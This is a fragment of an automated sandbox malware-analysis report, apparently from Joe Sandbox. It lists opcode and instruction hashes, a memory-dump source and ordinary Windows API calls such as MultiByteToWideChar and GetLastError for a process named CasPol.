                                                                                                                      • Opcode ID: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                                                                                                      • Instruction ID: 4302d9c34f7b4dbdac7fc8682473a51625df35810590c52ad239c14707b44b4b
                                                                                                                      • Opcode Fuzzy Hash: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                                                                                                      • Instruction Fuzzy Hash: C1D0C938559211AFD7614B68BC08B453B6AA745222F108277F828413F1C72598A4AE1C
                                                                                                                      APIs
                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FB04
                                                                                                                      • GetLastError.KERNEL32 ref: 0043FB12
                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB6D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1717984340-0
                                                                                                                      • Opcode ID: 87fd12a014d32a69e1321f94067b17621f6fc27d46547f6ea495f007f72d0054
                                                                                                                      • Instruction ID: 94dc36b571f96c0084dd62d2177e44ea0606df48237064e9d41db09688609199
                                                                                                                      • Opcode Fuzzy Hash: 87fd12a014d32a69e1321f94067b17621f6fc27d46547f6ea495f007f72d0054
                                                                                                                      • Instruction Fuzzy Hash: 66413870E00206AFCF219F64C854A6BF7A9EF09320F1451BBF8585B2A1E738AC09C759